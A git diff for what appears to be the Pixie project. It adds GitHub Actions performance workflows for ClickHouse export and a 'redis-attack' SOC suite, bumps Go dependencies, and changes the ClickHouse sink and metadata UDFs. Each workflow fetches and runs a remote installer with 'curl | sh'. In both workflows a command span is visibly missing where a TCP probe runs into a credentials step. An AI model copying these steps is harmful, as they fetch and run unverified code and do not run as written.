diff --git a/.github/workflows/perf_clickhouse.yaml b/.github/workflows/perf_clickhouse.yaml new file mode 100644 index 00000000000..e3f34671652 --- /dev/null +++ b/.github/workflows/perf_clickhouse.yaml @@ -0,0 +1,158 @@ +--- +name: perf-eval-clickhouse +on: + workflow_dispatch: + inputs: + ref: + description: 'Branch or commit' + required: false + type: string + tags: + description: 'Tags (comma separated)' + required: false + type: string +permissions: + contents: read + packages: write +jobs: + get-dev-image-with-extras: + uses: ./.github/workflows/get_image.yaml + with: + image-base-name: "dev_image_with_extras" + ref: ${{ inputs.ref }} + + clickhouse-export-perf: + name: ClickHouse export perf eval + needs: get-dev-image-with-extras + runs-on: oracle-vm-16cpu-64gb-x86-64 + container: + image: ${{ needs.get-dev-image-with-extras.outputs.image-with-tag }} + options: --cap-add=NET_ADMIN --device=/dev/net/tun + steps: + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + ref: ${{ inputs.ref }} + fetch-depth: 0 + - name: Add pwd to git safe dir + run: git config --global --add safe.directory `pwd` + - id: get-commit-sha + run: echo "commit-sha=$(git rev-parse --short HEAD)" >> $GITHUB_OUTPUT + + # TODO(ddelnano): swap TAILSCALE_AUTH_KEY for an OAuth client once one is + # provisioned in the k8sstormcenter tailnet. Use + # `tailscale/github-action@v2` with `oauth-client-id` and `oauth-secret` + # inputs (`TS_OAUTH_CLIENT_ID` / `TS_OAUTH_CLIENT_SECRET` secrets) so + # credentials rotate automatically instead of expiring on a fixed cadence. + - name: Start Tailscale sidecar + env: + TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }} + run: | + curl -fsSL https://tailscale.com/install.sh | sh + mkdir -p /var/run/tailscale /var/lib/tailscale + tailscaled \ + --socket=/var/run/tailscale/tailscaled.sock \ + --state=/var/lib/tailscale/tailscaled.state & + until tailscale status --json >/dev/null 2>&1; do sleep 1; done + tailscale up \ + --authkey="${TS_AUTHKEY}" \ + --accept-routes \ + --hostname="pixie-perf-ci-${GITHUB_RUN_ID}" + + - name: Write kubeconfig + env: + KUBECONFIG_B64: ${{ secrets.KUBECONFIG_B64 }} + run: | + mkdir -p "${RUNNER_TEMP}" + echo "${KUBECONFIG_B64}" | base64 -d > "${RUNNER_TEMP}/kubeconfig" + chmod 600 "${RUNNER_TEMP}/kubeconfig" + + # Fail fast if Tailscale can't reach the cluster API, before the 2+ minute + # bazel/skaffold build wastes time. + - name: Tailscale connectivity probe + env: + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + tailscale status + tailscale netcheck + api_host="$(kubectl --kubeconfig="$KUBECONFIG" config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed -E 's|https?://||; s|/.*||')" + api_ip="${api_host%%:*}" + api_port="${api_host##*:}" + echo "--- tailscale ping ${api_ip} ---" + tailscale ping --c 3 --until-direct=false "${api_ip}" || true + echo "--- tcp probe ${api_ip}:${api_port} ---" + timeout 5 bash -c " /tmp/gcloud.json + chmod 600 /tmp/gcloud.json + echo "gcloud-creds=/tmp/gcloud.json" >> $GITHUB_OUTPUT + - name: Activate gcloud service account + env: + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + run: | + service_account="$(jq -r '.client_email' "$GOOGLE_APPLICATION_CREDENTIALS")" + gcloud auth activate-service-account "${service_account}" --key-file="$GOOGLE_APPLICATION_CREDENTIALS" + gcloud auth configure-docker + + - name: Log in to GHCR + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: echo "${GH_TOKEN}" | docker login ghcr.io -u "${{ github.actor }}" --password-stdin + + - name: Build and install px CLI + run: | + bazel build --config=x86_64_sysroot //src/pixie_cli:px + install -m 0755 bazel-bin/src/pixie_cli/px_/px /usr/local/bin/px + px version + + - name: Run clickhouse-export perf + env: + PX_API_KEY: ${{ secrets.PX_API_KEY }} + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + bazel run //src/e2e_test/perf_tool:perf_tool -- run \ + --api_key="${PX_API_KEY}" \ + --cloud_addr=pixie.austrianopencloudcommunity.org:443 \ + --commit_sha="${{ steps.get-commit-sha.outputs.commit-sha }}" \ + --experiment_name=clickhouse-export \ + --suite=clickhouse-exec \ + --use_local_cluster \ + --export_backend=parquet-gcs \ + --gcs_bucket=k8sstormcenter-soc-perf \ + --container_repo=ghcr.io/k8sstormcenter \ + --prom_recorder_override 'clickhouse-operator=:k8ss-forensic' \ + --tags "${{ inputs.tags }}" + + - name: Upload skaffold stderr log + if: always() + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2 + with: + name: skaffold-stderr-${{ github.run_id }}-${{ github.run_attempt }} + path: ${{ runner.temp }}/skaffold-stderr.log + if-no-files-found: ignore + + - name: Deactivate gcloud service account + if: always() + run: gcloud auth revoke || true + + - name: Tailscale logout + if: always() + run: tailscale logout || true diff --git a/.github/workflows/perf_soc_attack.yaml b/.github/workflows/perf_soc_attack.yaml new file mode 100644 index 00000000000..872dcbb4a8c --- /dev/null +++ b/.github/workflows/perf_soc_attack.yaml @@ -0,0 +1,158 @@ +--- +name: perf-eval-soc-attack +on: + workflow_dispatch: + inputs: + ref: + description: 'Branch or commit' + required: false + type: string + tags: + description: 'Tags (comma separated)' + required: false + type: string +permissions: + contents: read + packages: write +jobs: + get-dev-image-with-extras: + uses: ./.github/workflows/get_image.yaml + with: + image-base-name: "dev_image_with_extras" + ref: ${{ inputs.ref }} + + soc-attack-perf: + name: Sovereign SOC redis-attack perf eval + needs: get-dev-image-with-extras + runs-on: oracle-vm-16cpu-64gb-x86-64 + container: + image: ${{ needs.get-dev-image-with-extras.outputs.image-with-tag }} + options: --cap-add=NET_ADMIN --device=/dev/net/tun + steps: + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + ref: ${{ inputs.ref }} + fetch-depth: 0 + - name: Add pwd to git safe dir + run: git config --global --add safe.directory `pwd` + - id: get-commit-sha + run: echo "commit-sha=$(git rev-parse --short HEAD)" >> $GITHUB_OUTPUT + + # TODO(ddelnano): swap TAILSCALE_AUTH_KEY for an OAuth client once one is + # provisioned in the k8sstormcenter tailnet. Use + # `tailscale/github-action@v2` with `oauth-client-id` and `oauth-secret` + # inputs (`TS_OAUTH_CLIENT_ID` / `TS_OAUTH_CLIENT_SECRET` secrets) so + # credentials rotate automatically instead of expiring on a fixed cadence. + - name: Start Tailscale sidecar + env: + TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }} + run: | + curl -fsSL https://tailscale.com/install.sh | sh + mkdir -p /var/run/tailscale /var/lib/tailscale + tailscaled \ + --socket=/var/run/tailscale/tailscaled.sock \ + --state=/var/lib/tailscale/tailscaled.state & + until tailscale status --json >/dev/null 2>&1; do sleep 1; done + tailscale up \ + --authkey="${TS_AUTHKEY}" \ + --accept-routes \ + --hostname="pixie-perf-ci-${GITHUB_RUN_ID}" + + - name: Write kubeconfig + env: + KUBECONFIG_B64: ${{ secrets.KUBECONFIG_B64 }} + run: | + mkdir -p "${RUNNER_TEMP}" + echo "${KUBECONFIG_B64}" | base64 -d > "${RUNNER_TEMP}/kubeconfig" + chmod 600 "${RUNNER_TEMP}/kubeconfig" + + # Fail fast if Tailscale can't reach the cluster API, before the 2+ minute + # bazel/skaffold build wastes time. + - name: Tailscale connectivity probe + env: + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + tailscale status + tailscale netcheck + api_host="$(kubectl --kubeconfig="$KUBECONFIG" config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed -E 's|https?://||; s|/.*||')" + api_ip="${api_host%%:*}" + api_port="${api_host##*:}" + echo "--- tailscale ping ${api_ip} ---" + tailscale ping --c 3 --until-direct=false "${api_ip}" || true + echo "--- tcp probe ${api_ip}:${api_port} ---" + timeout 5 bash -c " /tmp/gcloud.json + chmod 600 /tmp/gcloud.json + echo "gcloud-creds=/tmp/gcloud.json" >> $GITHUB_OUTPUT + - name: Activate gcloud service account + env: + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + run: | + service_account="$(jq -r '.client_email' "$GOOGLE_APPLICATION_CREDENTIALS")" + gcloud auth activate-service-account "${service_account}" --key-file="$GOOGLE_APPLICATION_CREDENTIALS" + gcloud auth configure-docker + + - name: Log in to GHCR + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: echo "${GH_TOKEN}" | docker login ghcr.io -u "${{ github.actor }}" --password-stdin + + - name: Build and install px CLI + run: | + bazel build --config=x86_64_sysroot //src/pixie_cli:px + install -m 0755 bazel-bin/src/pixie_cli/px_/px /usr/local/bin/px + px version + + # The sovereign-soc suite installs Kubescape + Vector on the experiment + # cluster as part of the run (see KubescapeVectorWorkload). The + # kubescape-operator chart is pre-rendered under + # src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/ + # and applied via PrerenderedDeploy, so no extra ./scripts step is needed. + # + # ClickHouse operator metrics are scraped on the forensic cluster via + # the prom_recorder_override; the kubescape node-agent prom recorder + # is intentionally NOT overridden — kubescape runs on the experiment + # cluster (where redis+bobctl drive traffic), so the recorder uses the + # default kubeconfig. + - name: Run sovereign-soc redis-attack perf + env: + PX_API_KEY: ${{ secrets.PX_API_KEY }} + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + bazel run //src/e2e_test/perf_tool:perf_tool -- run \ + --api_key="${PX_API_KEY}" \ + --cloud_addr=pixie.austrianopencloudcommunity.org:443 \ + --commit_sha="${{ steps.get-commit-sha.outputs.commit-sha }}" \ + --experiment_name=redis-attack \ + --suite=sovereign-soc \ + --use_local_cluster \ + --export_backend=parquet-gcs \ + --gcs_bucket=k8sstormcenter-soc-perf \ + --container_repo=ghcr.io/k8sstormcenter \ + --prom_recorder_override 'clickhouse-operator=:k8ss-forensic' \ + --max_retries=1 + --tags "${{ inputs.tags }}" + + - name: Tailscale logout + if: always() + run: tailscale logout || true diff --git a/go.mod b/go.mod index 4224503b9c1..10f19e7657b 100644 --- a/go.mod +++ b/go.mod @@ -52,6 +52,7 @@ require ( github.com/ory/dockertest/v3 v3.8.1 github.com/ory/hydra-client-go v1.9.2 github.com/ory/kratos-client-go v0.10.1 + github.com/parquet-go/parquet-go v0.25.1 github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5 github.com/prometheus/client_golang v1.14.0 github.com/prometheus/client_model v0.3.0 @@ -115,6 +116,7 @@ require ( github.com/VividCortex/ewma v1.1.1 // indirect github.com/a8m/envsubst v1.3.0 // indirect github.com/alecthomas/participle/v2 v2.0.0-beta.5 // indirect + github.com/andybalholm/brotli v1.1.0 // indirect github.com/andybalholm/cascadia v1.1.0 // indirect github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2 // indirect github.com/beorn7/perks v1.0.1 // indirect @@ -171,7 +173,7 @@ require ( github.com/google/go-querystring v1.1.0 // indirect github.com/google/gofuzz v1.2.0 // indirect github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 // indirect - github.com/google/uuid v1.3.0 // indirect + github.com/google/uuid v1.6.0 // indirect github.com/googleapis/gax-go/v2 v2.7.0 // indirect github.com/gorilla/securecookie v1.1.1 // indirect github.com/gorilla/websocket v1.5.0 // indirect @@ -191,7 +193,7 @@ require ( github.com/json-iterator/go v1.1.12 // indirect github.com/jstemmer/go-junit-report v0.9.1 // indirect github.com/kevinburke/ssh_config v0.0.0-20190725054713-01f96b0aa0cd // indirect - github.com/klauspost/compress v1.17.2 // indirect + github.com/klauspost/compress v1.17.9 // indirect github.com/kr/pretty v0.2.1 // indirect github.com/kr/text v0.2.0 // indirect github.com/kylelemons/godebug v1.1.0 // indirect @@ -232,6 +234,7 @@ require ( github.com/patrickmn/go-cache v2.1.0+incompatible // indirect github.com/pelletier/go-toml v1.9.3 // indirect github.com/peterbourgon/diskv v2.0.1+incompatible // indirect + github.com/pierrec/lz4/v4 v4.1.21 // indirect github.com/pkg/errors v0.9.1 // indirect github.com/pmezard/go-difflib v1.0.0 // indirect github.com/prometheus/procfs v0.9.0 // indirect @@ -276,7 +279,7 @@ require ( golang.org/x/xerrors v0.0.0-20220907171357-04be3eba64a2 // indirect gomodules.xyz/jsonpatch/v2 v2.2.0 // indirect google.golang.org/appengine v1.6.7 // indirect - google.golang.org/protobuf v1.29.1 // indirect + google.golang.org/protobuf v1.34.2 // indirect gopkg.in/inf.v0 v0.9.1 // indirect gopkg.in/ini.v1 v1.67.0 // indirect gopkg.in/launchdarkly/go-jsonstream.v1 v1.0.1 // indirect @@ -317,3 +320,5 @@ replace ( google.golang.org/grpc => google.golang.org/grpc v1.43.0 gopkg.in/yaml.v2 => gopkg.in/yaml.v2 v2.4.0 ) + +replace google.golang.org/protobuf => google.golang.org/protobuf v1.29.1 diff --git a/go.sum b/go.sum index b8697cb4add..533a9f3f9b6 100644 --- a/go.sum +++ b/go.sum @@ -87,6 +87,8 @@ github.com/alecthomas/template v0.0.0-20190718012654-fb15b899a751/go.mod h1:LOuy github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= github.com/alecthomas/units v0.0.0-20190717042225-c3de453c63f4/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= github.com/alecthomas/units v0.0.0-20190924025748-f65c72e2690d/go.mod h1:rBZYJk541a8SKzHPHnH3zbiI+7dagKZ0cgpgrD7Fyho= +github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= +github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= github.com/andybalholm/cascadia v1.1.0 h1:BuuO6sSfQNFRu1LppgbD25Hr2vLYW25JvxHs5zzsLTo= github.com/andybalholm/cascadia v1.1.0/go.mod h1:GsXiBklL0woXo1j/WYWtSYYC4ouU9PqHO0sqidkEA4Y= github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239 h1:kFOfPq6dUM1hTo4JG6LR5AXSUEsOjtdm0kw0FtQtMJA= @@ -447,8 +449,8 @@ github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 h1:El6M4kTTCOh6aBiKaU github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3pAXIBCelhxNneeOaAeabZDe5s4K6zSpQ= github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= -github.com/google/uuid v1.3.0 h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I= -github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= +github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= github.com/googleapis/gax-go/v2 v2.7.0 h1:IcsPKeInNvYi7eqSaDjiZqDDKu5rsmunY0Y1YupQSSQ= github.com/googleapis/gax-go/v2 v2.7.0/go.mod h1:TEop28CZZQ2y+c0VxMUmu1lV+fQx57QpBWsYpwqHJx8= @@ -579,8 +581,8 @@ github.com/klauspost/compress v1.8.2/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0 github.com/klauspost/compress v1.9.0/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= github.com/klauspost/compress v1.9.5/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= github.com/klauspost/compress v1.13.6/go.mod h1:/3/Vjq9QcHkK5uEr5lBEmyoZ1iFhe47etQ6QUkpK6sk= -github.com/klauspost/compress v1.17.2 h1:RlWWUY/Dr4fL8qk9YG7DTZ7PDgME2V4csBXA8L/ixi4= -github.com/klauspost/compress v1.17.2/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= +github.com/klauspost/compress v1.17.9 h1:6KIumPrER1LHsvBVuDa0r5xaG0Es51mhhB9BQB2qeMA= +github.com/klauspost/compress v1.17.9/go.mod h1:Di0epgTjJY877eYKx5yC51cX2A2Vl2ibi7bDH9ttBbw= github.com/klauspost/cpuid v1.2.1/go.mod h1:Pj4uuM528wm8OyEC2QMXAi2YiTZ96dNQPGgoMS4s3ek= github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= github.com/konsorten/go-windows-terminal-sequences v1.0.2/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= @@ -775,6 +777,8 @@ github.com/ory/hydra-client-go v1.9.2 h1:sbp+8zwEJvhqSxcY8HiOkXeY2FspsfSOJ5ajJ07 github.com/ory/hydra-client-go v1.9.2/go.mod h1:TTg4Gt0SDC8+XoGtj5qzdtqxapfFW+Vmm41PFuC6n/E= github.com/ory/kratos-client-go v0.10.1 h1:kSRk+0leCJ1nPMS+FPho8b9WMzrKNpgszvta0Xo32QU= github.com/ory/kratos-client-go v0.10.1/go.mod h1:dOQIsar76K07wMPJD/6aMhrWyY+sFGEagLDLso1CpsA= +github.com/parquet-go/parquet-go v0.25.1 h1:l7jJwNM0xrk0cnIIptWMtnSnuxRkwq53S+Po3KG8Xgo= +github.com/parquet-go/parquet-go v0.25.1/go.mod h1:AXBuotO1XiBtcqJb/FKFyjBG4aqa3aQAAWF3ZPzCanY= github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc= github.com/patrickmn/go-cache v2.1.0+incompatible h1:HRMgzkcYKYpi3C8ajMPV8OFXaaRUnok+kx1WdO15EQc= github.com/patrickmn/go-cache v2.1.0+incompatible/go.mod h1:3Qf8kWWT7OJRJbdiICTKqZju1ZixQ/KpMGzzAfe6+WQ= @@ -788,6 +792,8 @@ github.com/peterbourgon/diskv v2.0.1+incompatible h1:UBdAOUP5p4RWqPBg048CAvpKN+v github.com/peterbourgon/diskv v2.0.1+incompatible/go.mod h1:uqqh8zWWbv1HBMNONnaR/tNboyR3/BZd58JJSHlUSCU= github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5 h1:rZQtoozkfsiNs36c7Tdv/gyGNzD1X1XWKO8rptVNZuM= github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5/go.mod h1:iIss55rKnNBTvrwdmkUpLnDpZoAHvWaiq5+iMmen4AE= +github.com/pierrec/lz4/v4 v4.1.21 h1:yOVMLb6qSIDP67pl/5F7RepeKYu/VmTyEXvuMI5d9mQ= +github.com/pierrec/lz4/v4 v4.1.21/go.mod h1:gZWDp/Ze/IJXGXf23ltt2EXimqmTUXEy0GFuRQyBid4= github.com/pingcap/errors v0.11.4 h1:lFuQV/oaUMGcD2tqt+01ROSmJs75VG1ToEOkZIZ4nE4= github.com/pingcap/errors v0.11.4/go.mod h1:Oi8TUi2kEtXXLMJk9l1cGmz20kV3TaQ0usTwv5KuLY8= github.com/pkg/diff v0.0.0-20210226163009-20ebb0f2a09e h1:aoZm08cpOy4WuID//EZDgcC4zIxODThtZNPirFr42+A= @@ -1327,10 +1333,6 @@ google.golang.org/genproto v0.0.0-20211208223120-3a66f561d7aa h1:I0YcKz0I7OAhddo google.golang.org/genproto v0.0.0-20211208223120-3a66f561d7aa/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= google.golang.org/grpc v1.43.0 h1:Eeu7bZtDZ2DpRCsLhUlcrLnvYaMK1Gz86a+hMVvELmM= google.golang.org/grpc v1.43.0/go.mod h1:k+4IHHFw41K8+bbowsex27ge2rCb65oeWqe4jJ590SU= -google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= -google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= -google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= -google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= google.golang.org/protobuf v1.29.1 h1:7QBf+IK2gx70Ap/hDsOmam3GE0v9HicjfEdAxE62UoM= google.golang.org/protobuf v1.29.1/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw= diff --git a/go_deps.bzl b/go_deps.bzl index 6590dff5052..8ff37dbcbf6 100644 --- a/go_deps.bzl +++ b/go_deps.bzl @@ -156,8 +156,8 @@ def pl_go_dependencies(): name = "com_github_andybalholm_brotli", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/andybalholm/brotli", - sum = "h1:8uQZIdzKmjc/iuPu7O2ioW48L81FgatrcpfFmiq/cCs=", - version = "v1.0.5", + sum = "h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M=", + version = "v1.1.0", ) go_repository( name = "com_github_andybalholm_cascadia", @@ -1628,8 +1628,8 @@ def pl_go_dependencies(): name = "com_github_google_uuid", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/google/uuid", - sum = "h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I=", - version = "v1.3.0", + sum = "h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=", + version = "v1.6.0", ) go_repository( name = "com_github_googleapis_enterprise_certificate_proxy", @@ -2282,8 +2282,8 @@ def pl_go_dependencies(): name = "com_github_klauspost_compress", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/klauspost/compress", - sum = "h1:RlWWUY/Dr4fL8qk9YG7DTZ7PDgME2V4csBXA8L/ixi4=", - version = "v1.17.2", + sum = "h1:6KIumPrER1LHsvBVuDa0r5xaG0Es51mhhB9BQB2qeMA=", + version = "v1.17.9", ) go_repository( name = "com_github_klauspost_cpuid", @@ -2992,6 +2992,13 @@ def pl_go_dependencies(): sum = "h1:mvZaddk4E4kLcXhzb+cxBsMPYp2pHqiQpWYkInsuZPQ=", version = "v1.3.0", ) + go_repository( + name = "com_github_parquet_go_parquet_go", + build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], + importpath = "github.com/parquet-go/parquet-go", + sum = "h1:l7jJwNM0xrk0cnIIptWMtnSnuxRkwq53S+Po3KG8Xgo=", + version = "v0.25.1", + ) go_repository( name = "com_github_pascaldekloe_goe", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], @@ -3041,6 +3048,13 @@ def pl_go_dependencies(): sum = "h1:rZQtoozkfsiNs36c7Tdv/gyGNzD1X1XWKO8rptVNZuM=", version = "v0.0.0-20171002181615-b8543db493a5", ) + go_repository( + name = "com_github_pierrec_lz4_v4", + build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], + importpath = "github.com/pierrec/lz4/v4", + sum = "h1:yOVMLb6qSIDP67pl/5F7RepeKYu/VmTyEXvuMI5d9mQ=", + version = "v4.1.21", + ) go_repository( name = "com_github_pingcap_errors", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], @@ -4427,6 +4441,7 @@ def pl_go_dependencies(): name = "org_golang_google_protobuf", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "google.golang.org/protobuf", + replace = "google.golang.org/protobuf", sum = "h1:7QBf+IK2gx70Ap/hDsOmam3GE0v9HicjfEdAxE62UoM=", version = "v1.29.1", ) diff --git a/skaffold/skaffold_vizier.yaml b/skaffold/skaffold_vizier.yaml index 33389dffb2e..f8370a1f7e1 100644 --- a/skaffold/skaffold_vizier.yaml +++ b/skaffold/skaffold_vizier.yaml @@ -81,6 +81,7 @@ profiles: path: /build/artifacts/context=./bazel/args value: - --compilation_mode=opt + - --config=x86_64_sysroot - name: heap patches: - op: add diff --git a/src/carnot/exec/clickhouse_export_sink_node.cc b/src/carnot/exec/clickhouse_export_sink_node.cc index 6a11a42d37a..c7000ab99d4 100644 --- a/src/carnot/exec/clickhouse_export_sink_node.cc +++ b/src/carnot/exec/clickhouse_export_sink_node.cc @@ -35,6 +35,9 @@ namespace px { namespace carnot { namespace exec { +// TODO(ddelnano): Defend against columns that don't exist. These should be +// ignored by the Node. + using table_store::schema::RowBatch; using table_store::schema::RowDescriptor; @@ -148,12 +151,12 @@ Status ClickHouseExportSinkNode::ConsumeNextImpl(ExecState* /*exec_state*/, cons break; } case types::UINT128: { - // UINT128 is exported as STRING (UUID format) + // UINT128 is exported as STRING in "high:low" format to match + // the ClickHouseSourceNode's parsing in clickhouse_source_node.cc auto col = std::make_shared(); for (int64_t i = 0; i < num_rows; ++i) { auto val = types::GetValueFromArrowArray(arrow_col.get(), i); - std::string uuid_str = sole::rebuild(absl::Uint128High64(val), absl::Uint128Low64(val)).str(); - col->Append(uuid_str); + col->Append(absl::Substitute("$0:$1", absl::Uint128High64(val), absl::Uint128Low64(val))); } block.AppendColumn(mapping.clickhouse_column_name(), col); break; @@ -164,6 +167,34 @@ Status ClickHouseExportSinkNode::ConsumeNextImpl(ExecState* /*exec_state*/, cons } } + // Auto-derive event_time from time_ if time_ is present but event_time is not. + // The ClickHouse table schema uses event_time (DateTime64(3), milliseconds) for + // partitioning and ordering, but the Pixie table has time_ (TIME64NS, nanoseconds). + bool has_time_ = false; + bool has_event_time = false; + int time_col_index = -1; + for (const auto& mapping : plan_node_->column_mappings()) { + if (mapping.clickhouse_column_name() == "time_") { + has_time_ = true; + time_col_index = mapping.input_column_index(); + } + if (mapping.clickhouse_column_name() == "event_time") { + has_event_time = true; + } + } + + if (has_time_ && !has_event_time && time_col_index >= 0) { + auto arrow_col = rb.ColumnAt(time_col_index); + int64_t num_rows = arrow_col->length(); + auto event_time_col = std::make_shared(3); + for (int64_t i = 0; i < num_rows; ++i) { + int64_t ns_val = types::GetValueFromArrowArray(arrow_col.get(), i); + // Convert nanoseconds to milliseconds for DateTime64(3) + event_time_col->Append(ns_val / 1000000LL); + } + block.AppendColumn("event_time", event_time_col); + } + // Insert the block into ClickHouse clickhouse_client_->Insert(plan_node_->table_name(), block); diff --git a/src/carnot/funcs/metadata/metadata_ops.cc b/src/carnot/funcs/metadata/metadata_ops.cc index 3fe4e21692d..d6409e6f456 100644 --- a/src/carnot/funcs/metadata/metadata_ops.cc +++ b/src/carnot/funcs/metadata/metadata_ops.cc @@ -127,6 +127,7 @@ void RegisterMetadataOpsOrDie(px::carnot::udf::Registry* registry) { registry->RegisterOrDie("upid_to_deployment_id"); registry->RegisterOrDie("upid_to_string"); registry->RegisterOrDie("_exec_hostname"); + registry->RegisterOrDie("_pem_hostname"); registry->RegisterOrDie("_exec_host_num_cpus"); registry->RegisterOrDie("vizier_id"); registry->RegisterOrDie("vizier_name"); diff --git a/src/carnot/funcs/metadata/metadata_ops.h b/src/carnot/funcs/metadata/metadata_ops.h index 241079858a4..af82f9738f8 100644 --- a/src/carnot/funcs/metadata/metadata_ops.h +++ b/src/carnot/funcs/metadata/metadata_ops.h @@ -2926,6 +2926,33 @@ class HostnameUDF : public ScalarUDF { } }; +class PEMHostnameUDF : public ScalarUDF { + public: + /** + * @brief Gets the hostname of the PEM agent's machine. + * Unlike _exec_hostname (UDF_ALL), this is restricted to UDF_PEM so the + * distributed planner is forced to execute it on the PEM before data is + * shipped to Kelvin. Use this when the hostname must reflect the agent + * that collected the data rather than the agent that exports it. + */ + StringValue Exec(FunctionContext* ctx) { + auto md = GetMetadataState(ctx); + return md->hostname(); + } + + static udf::ScalarUDFDocBuilder Doc() { + return udf::ScalarUDFDocBuilder("Get the hostname of the PEM agent.") + .Details( + "Get the hostname of the PEM agent that collected the data. " + "This UDF is 